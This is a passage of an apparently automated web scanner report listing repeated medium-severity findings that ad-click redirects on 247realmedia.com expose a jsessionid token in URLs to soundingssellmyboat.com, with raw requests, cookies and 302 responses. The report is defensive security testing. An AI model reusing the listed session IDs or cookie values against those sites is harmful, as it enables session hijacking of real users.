Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.27. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.28. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.29. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.30. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.31. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.32. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.33. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.34. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.35. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.36. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:22:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.37. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.38. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.39. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:01:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.40. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
